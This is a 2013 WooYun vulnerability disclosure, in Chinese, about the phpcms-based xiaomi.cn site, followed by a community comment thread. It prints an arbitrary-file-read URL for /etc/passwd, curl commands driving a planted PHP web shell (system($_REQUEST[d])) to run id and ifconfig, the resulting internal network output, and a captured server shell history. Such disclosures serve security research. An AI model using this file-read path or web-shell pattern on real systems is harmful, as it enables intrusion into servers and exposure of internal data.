当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(54) 关注此漏洞

缺陷编号: WooYun-2013-41385

漏洞标题: 一次小米未完成的内网渗透测试(仅测试可能性)

相关厂商: 小米科技

漏洞作者: 路人甲

提交时间: 2013-10-29 17:15

公开时间: 2013-10-30 10:36

漏洞类型: 命令执行

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 第三方框架 第三方不可信程序 php代码执行 补丁不及时

8人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-29: 细节已通知厂商并且等待厂商处理中
2013-10-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

典型的一个分站业务导致的问题,本来想证明下业务架构和运维方面的问题,结果近期比较忙结果业务下线了,悲催!

PS: 猜猜我是谁

详细说明:

www.xiaomi.cn使用phpcms搭建



code 区域
http://www.xiaomi.cn/api.php?op=ajax_domain&url=/etc/passwd





0.jpg





1 (2).jpg





1.jpg





3.jpg





4.jpg





5.jpg

漏洞证明:

code 区域
curl http://www.xiaomi.cn/phpsso_server/1.php -d 'c=system($_REQUEST[d]);&d=id'


uid=10000(work) gid=10000(work) groups=10000(work)







code 区域
curl http://www.xiaomi.cn/phpsso_server/1.php -d 'c=system($_REQUEST[d]);&d=/sbin/ifconfig'


eth0      Link encap:Ethernet  HWaddr 00:25:90:97:E5:14  


          inet addr:10.21.1.107  Bcast:10.21.1.255  Mask:255.255.255.0


          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1


          RX packets:1903443069 errors:0 dropped:0 overruns:0 frame:0


          TX packets:2863354900 errors:0 dropped:0 overruns:0 carrier:0


          collisions:0 txqueuelen:1000 


          RX bytes:987513424371 (919.6 GiB)  TX bytes:2483428852473 (2.2 TiB)


          Memory:df980000-dfa00000





code 区域
#1377263539


ls


#1377263549


vi /home/work/app/php/etc/php.ini 


#1377263569


/home/work/app/php/run.sh restar


#1377263571


/home/work/app/php/run.sh restart


#1377263708


tail /home/work/logs/php/php_error.log 


#1377263752


vi /home/work/app/php/etc/php.ini 


#1377263862


/home/work/app/php/run.sh restart


#1377264188


vi /home/work/app/php/etc/php.ini 


#1377264319


/home/work/app/php/run.sh restart


#1377264540


vi /home/work/www/api.xiaomi.cn/config/database.php 


#1377265088


tail /home/work/logs/php/php_error.log 


#1377265097


tail -100 /home/work/logs/php/php_error.log 


#1377265318


curl -I -H "host:api.xiaomi.cn" http://127.0.0.1:8000/cms/category/getcategory/cat_id/6/num/10


#1377265328


curl -i -H "host:api.xiaomi.cn" http://127.0.0.1:8000/cms/category/getcategory/cat_id/6/num/10


#1377265340


ls


#1377265342


cd www/


#1377265342

修复方案:

应用架构有问题(第三方的可有监控?)

网络架构有问题(网络边界是否有隔离?)

系统架构有问题(是否将运维和线上业务账号分离?)

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-10-30 10:36

厂商回复:

现在的“白帽子”是越来越看不懂了,以前一定是会报“小米网phpcms任意文件读取漏洞”。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2013-10-29 17:23 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    应该是 @猪猪侠

    1# 回复此人
  2. 2013-10-29 17:24 | xxw ( 路人 | Rank:29 漏洞数:18 | 中国梦)
    0

    mark

    2# 回复此人
  3. 2013-10-29 17:37 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1878 漏洞数:154 | 不要患得患失,我羡慕你,但是我还是选择做...)
    0

    @xsser 我的某个洞子在首页展现了,但是没有收到邀请链接,处理下啊!!!另外,卤煮,你也要换马甲了啊?

    3# 回复此人
  4. 2013-10-29 17:37 | J′aron ( 路人 | Rank:17 漏洞数:5 | 问题真实存在但是影响不大.)
    0

    mark @猪猪侠

    4# 回复此人
  5. 2013-10-29 17:43 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | ☯☯☯☯☯☯☯☯☯☯)
    0

    这标题风格一看就知道了

    5# 回复此人
  6. 2013-10-29 17:45 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | ☯☯☯☯☯☯☯☯☯☯)
    0

    @小胖子 我猜是dell的那个

    6# 回复此人
  7. 2013-10-29 17:51 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1878 漏洞数:154 | 不要患得患失,我羡慕你,但是我还是选择做...)
    0

    @寂寞的瘦子 NO!

    7# 回复此人
  8. 2013-10-29 17:59 | 盈盈无绪 ( 实习白帽子 | Rank:49 漏洞数:15 | 此人很懒)
    0

    mark

    8# 回复此人
  9. 2013-10-30 01:44 | 想要减肥的胖纸 ( 普通白帽子 | Rank:255 漏洞数:43 )
    0

    虽然老夫很抵制小米的操蛋售后,并呼吁周围人不要买小米。但是这次渗透和本人无关。

    9# 回复此人
  10. 2013-10-30 08:24 | px1624 ( 普通白帽子 | Rank:1104 漏洞数:186 | px1624)
    0

    此站点已经废弃下线,感谢猪猪侠的精彩分析。

    10# 回复此人
  11. 2013-10-30 10:43 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1878 漏洞数:154 | 不要患得患失,我羡慕你,但是我还是选择做...)
    0

    @px1624 哈哈哈,你看厂商回复,厂商都在猜是谁了,怎么忽略了呢?

    11# 回复此人
  12. 2013-10-30 10:45 | Mr.Jen ( 路人 | Rank:13 漏洞数:2 | 开放自由)
    1

    小米生气 猜不出是谁 干脆忽略,叫你让我猜。。。

    12# 回复此人
  13. 2013-10-30 10:53 | HackBraid 认证白帽子 ( 普通白帽子 | Rank:1854 漏洞数:296 | 风暴网络安全空间: http://www.heysec.or...)
    0

    学习了

    13# 回复此人
  14. 2013-10-30 10:59 | 带馅儿馒头 认证白帽子 ( 核心白帽子 | Rank:1367 漏洞数:154 | 心在,梦在)
    0

    我去,为啥忽略了,搞不懂

    14# 回复此人
  15. 2013-10-30 11:16 | px1624 ( 普通白帽子 | Rank:1104 漏洞数:186 | px1624)
    0

    @带馅儿馒头 @小胖子 我也没看懂怎么忽略了。。哈哈 @xsser

    15# 回复此人
  16. 2013-10-30 11:31 | 请好心人解放我的左手 ( 路人 | Rank:12 漏洞数:2 | 昨天,有一个女孩拒绝了我的爱意,第二天早...)
    0

    哈哈 已经被修复了

    16# 回复此人
  17. 2013-10-30 14:38 | FallenAngel ( 路人 | 还没有发布任何漏洞 | 啊喔呃咿呜喻。。0.0)
    0

    @猪猪侠 哈哈

    17# 回复此人
  18. 2013-10-30 14:53 | c4rp3nt3r ( 实习白帽子 | Rank:70 漏洞数:10 | 人生的意义就在于从一个圈子跳到另一个更大...)
    2

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

    18# 回复此人
  19. 2013-10-30 15:17 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:4656 漏洞数:356 | 你都有那么多超级棒棒糖了,还要自由干吗?)
    0

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

    19# 回复此人
  20. 2013-10-30 15:43 | FallenAngel ( 路人 | 还没有发布任何漏洞 | 啊喔呃咿呜喻。。0.0)
    0

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

    20# 回复此人
  21. 2013-10-30 16:16 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    厂商的回复我怎么没看懂?谁翻译下,究竟要表达什么。。

    21# 回复此人
  22. 2013-10-30 16:17 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | ☯☯☯☯☯☯☯☯☯☯)
    1

    @疯狗 双引号用的nice。

    22# 回复此人
  23. 2013-10-30 18:34 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)
    1

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

    23# 回复此人
  24. 2013-10-30 22:39 | Eric ( 路人 | Rank:1 漏洞数:1 | 网络技术爱好者。)
    0

    @疯狗 现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

    24# 回复此人
  25. 2013-10-31 09:42 | F4K3R ( 普通白帽子 | Rank:318 漏洞数:34 | 求团队收留。)
    0

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

    25# 回复此人
  26. 2013-10-31 10:03 | 请好心人解放我的左手 ( 路人 | Rank:12 漏洞数:2 | 昨天,有一个女孩拒绝了我的爱意,第二天早...)
    0

    我小米社区刷了24W分 被封了,还说进去看看给解封了, 没想到这么快

    26# 回复此人
  27. 2013-10-31 10:18 | x-star ( 普通白帽子 | Rank:124 漏洞数:13 | Windows/Linux Kernel. Information Secur...)
    0

    @疯狗 厂商的意思是说 “不就是个PHPCMS任意文件读取漏洞吗? 你写那么严重干嘛? 谁让你写内网渗透的? 这下要挨领导打PP了。 ”

    27# 回复此人
  28. 2013-10-31 10:45 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    @x-star 感谢解答厂商的意思,我是真没理解,现在明白了。 厂商遇到问题可以沟通么,何必选择忽略漏洞呢?哎

    28# 回复此人
  29. 2013-11-06 20:14 | w5r2 ( 普通白帽子 | Rank:226 漏洞数:52 )
    0

    看来是生气了。

    29# 回复此人
  30. 2013-11-10 12:29 | 何松 ( 路人 | Rank:18 漏洞数:4 | 你看)
    0

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

    30# 回复此人
  31. 2013-12-24 11:49 | winsyk ( 普通白帽子 | Rank:108 漏洞数:16 | 越长大越孤单)
    0

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

    31# 回复此人
  32. 2014-03-29 03:27 | 伟哥 ( 普通白帽子 | Rank:110 漏洞数:29 | 不怕流氓有文化,就怕色狼有耐心,那么一只起...)
    0

    作者的意思应该是 通过这些可以完成内网渗透 而厂商 觉得这仅仅是一个任意文件下载而已

    32# 回复此人
  33. 2015-09-29 19:05 | saline ( 普通白帽子 | Rank:294 漏洞数:37 | Focus On Web Secur1ty)
    0

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子 ps:被脱裤了吧 小米的漏洞看过来都是被忽略的,你这个样子人家有漏洞也不发出来了,万年被脱把

    33# 回复此人

登录后才能发表评论,请先 登录